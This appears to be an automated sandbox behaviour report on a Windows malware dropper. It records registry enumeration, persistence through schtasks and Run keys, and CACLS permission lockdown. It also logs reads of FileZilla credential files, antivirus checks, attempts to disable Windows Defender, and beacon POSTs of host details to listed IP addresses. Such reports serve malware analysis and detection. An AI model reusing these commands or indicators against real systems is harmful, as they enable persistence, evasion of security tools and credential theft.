key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00A1-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00E1-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00E2-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0115-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0117-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-012B-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {91150000-0011-0000-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

 regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

 regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

 regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}
1 0 0
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
wmi SELECT * FROM Win32_Processor
host 77.91.68.63
host 83.97.73.129
host 83.97.73.131
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

ControlService

 service_handle: 0x0000000000ca21b0
service_name: None
control_code: 1
0 0

ControlService

 service_handle: 0x0000000000ca22a0
service_name: None
control_code: 1
0 0
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\foto172.exe reg_value C:\Users\test22\AppData\Local\Temp\1000001051\foto172.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fotod95.exe reg_value C:\Users\test22\AppData\Local\Temp\1000002051\fotod95.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\mu.exe reg_value C:\Users\test22\AppData\Local\Temp\1000003051\mu.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
Time & API Arguments Status Return Repeated

LdrGetDllHandle

 module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

 module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
wmi SELECT * FROM Win32_VideoController
wmi SELECT * FROM AntivirusProduct
wmi SELECT * FROM Win32_OperatingSystem
wmi SELECT * FROM Win32_Process Where SessionId='1'
wmi SELECT * FROM AntiSpyWareProduct
wmi SELECT * FROM FirewallProduct
wmi SELECT * FROM Win32_DiskDrive
wmi SELECT * FROM Win32_Processor
Time & API Arguments Status Return Repeated

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Excel MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft PowerPoint MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Publisher MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Outlook MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Word MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - English
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Outils de vérification linguistique 2013 de Microsoft Office - Français
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - Español
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft InfoPath MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft DCF MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft OneNote MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Groove MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM UX MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Lync MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Acrobat Reader DC MUI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002a8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003bc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003bc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003bc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003bc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003bc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003bc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003bc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003bc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003bc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003bc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003bc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003bc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0
Time & API Arguments Status Return Repeated

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0
cmdline CACLS "rugen.exe" /P "test22:N"
cmdline CACLS "..\200f691d32" /P "test22:R" /E
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rugen.exe" /P "test22:N"&&CACLS "rugen.exe" /P "test22:R" /E&&echo Y|CACLS "..\200f691d32" /P "test22:N"&&CACLS "..\200f691d32" /P "test22:R" /E&&Exit
cmdline CACLS "..\200f691d32" /P "test22:N"
cmdline cmd /k echo Y|CACLS "rugen.exe" /P "test22:N"&&CACLS "rugen.exe" /P "test22:R" /E&&echo Y|CACLS "..\200f691d32" /P "test22:N"&&CACLS "..\200f691d32" /P "test22:R" /E&&Exit
cmdline CACLS "rugen.exe" /P "test22:R" /E
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
